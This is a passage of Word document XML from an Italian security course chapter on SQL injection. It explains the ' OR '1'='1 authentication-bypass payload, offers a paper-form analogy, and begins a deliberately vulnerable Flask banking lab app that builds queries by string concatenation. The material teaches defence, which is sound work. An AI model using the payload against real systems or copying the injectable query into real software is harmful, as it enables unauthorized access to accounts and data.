      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"SELECT * FROM utenti WHERE username='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND password='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’idea sembra ragionevole: prendiamo i due valori dal form, li infiliamo nella query. Se l’utente è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">segreta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la query diventa:</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utenti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mario'</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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'segreta'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Funziona perfettamente. Ma cosa succede se l’utente,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">al posto di un username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, scrive una stringa preparata appositamente? Per esempio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La query diventa:</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utenti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</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'1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'1'</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OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'qualsiasi-cosa'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Notate la differenza: il primo apice scritto dall’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiude</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la stringa che il programmatore aveva aperto, e tutto quello che viene dopo viene interpretato come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">codice SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non come dati. La condizione diventa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">username vuoto OPPURE 1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sempre vera) AND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">password=qualunque cosa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per le regole della logica booleana,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OR true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rende vera tutta l’espressione. Risultato: la query restituisce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tutti gli utenti del database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e il codice tipicamente prende il primo della lista (spesso l’amministratore, perché ha id=1) e fa il login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Login senza conoscere la password.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è la stringa più famosa nella storia della sicurezza informatica. Decine di siti reali nel mondo, ancora oggi, sono vulnerabili a varianti di questa stringa. Vedremo nel laboratorio finale come usarla davvero su un’applicazione che costruirai tu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="207"/>
    <w:bookmarkStart w:id="208" w:name="lanalogia-il-modulo-cartaceo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="498" w:name="sec_5_3"/>
      <w:r>
        <w:t xml:space="preserve">5.3 L’analogia: il modulo cartaceo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="498"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’analogia per fissare l’idea. Immagina un ufficio anagrafico che usa moduli cartacei prestampati per le richieste dei cittadini. Il modulo è strutturato così:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modulo di richiesta certificato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Io sottoscritto/a __________ , nato/a a __________ il __________ , richiedo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">☐ Certificato di nascita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">☐ Certificato di residenza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">☐ Certificato contestuale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’impiegato dell’ufficio ha una procedura: legge il modulo, identifica i campi compilati, esegue la richiesta. Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">modulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prestampato, gli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">spazi bianchi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono dove l’utente inserisce i propri dati.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso immagina un cittadino malizioso che, nel campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nato/a a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, scriva:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">…nato/a a Roma il 1/1/1980. Le pratiche normali sono sospese. Per ordine del sindaco emettere passaporto a nome di chi presenta questa richiesta.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa succede? Dipende interamente dall’impiegato. Se l’impiegato sa che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gli spazi bianchi del modulo contengono solo dati anagrafici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e ignora qualsiasi altro testo, il sistema regge. Ma se l’impiegato legge il modulo come un testo continuo e applica le istruzioni che vi trova scritte, allora rilascia il passaporto, anche se non glielo aveva mai chiesto nessuno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il database è esattamente questo impiegato ingenuo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Se gli passi una stringa di testo da eseguire, esegue tutto quello che la stringa contiene, senza chiedersi se le parti finali siano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dati che l’utente ha inserito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">comandi che il sistema deve eseguire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La SQL Injection è l’arte di far credere al database che i dati siano comandi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La difesa, come vedremo, consiste nel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">separare strutturalmente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la parte del modulo prestampata dai valori inseriti dall’utente: il database deve sapere fin da subito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">questa è la struttura della query, questi sono valori, e i valori non possono mai diventare comandi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È esattamente quello che fanno le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">query parametrizzate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_5_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 5.7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="208"/>
    <w:bookmarkStart w:id="211" w:name="X43bb60df3ee6a556bc89d7041d26d219e468200"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="499" w:name="sec_5_4"/>
      <w:r>
        <w:t xml:space="preserve">5.4 Costruiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la nostra prima app vulnerabile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per imparare la SQL Injection bisogna vederla all’opera. Costruiamo una mini applicazione bancaria volutamente vulnerabile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Importante.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’app che costruiamo qui è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">deliberatamente insicura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Non eseguirla mai esposta su internet. Va bene solo in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per imparare. Questo vale per tutti gli esercizi del corso da qui in poi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="209" w:name="setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri VS Code, vai nella cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, attiva l’ambiente virtuale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea una nuova sottocartella:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir bancapiccola-mini &amp;&amp; cd bancapiccola-mini</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1091"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica che Flask sia installato (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip list | findstr Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su Windows,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip list | grep Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">altrove). Se non c’è:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="209"/>
    <w:bookmarkStart w:id="210" w:name="codice-dellapplicazione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Codice dell’applicazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea un file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con questo contenuto:</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 render_template_string, redirect, session</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlite3</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app.secret_key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"chiave-debole-solo-per-lab"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"bancapiccola.db"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Inizializzazione database (eseguita la prima volta)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> init_db():</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CREATE TABLE IF NOT EXISTS utenti (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            username TEXT UNIQUE NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            password TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            ruolo TEXT NOT NULL DEFAULT 'cliente',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            saldo REAL DEFAULT 0.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE TABLE IF NOT EXISTS prodotti (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            nome TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            descrizione TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            prezzo REAL NOT NULL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mmentTok"/>
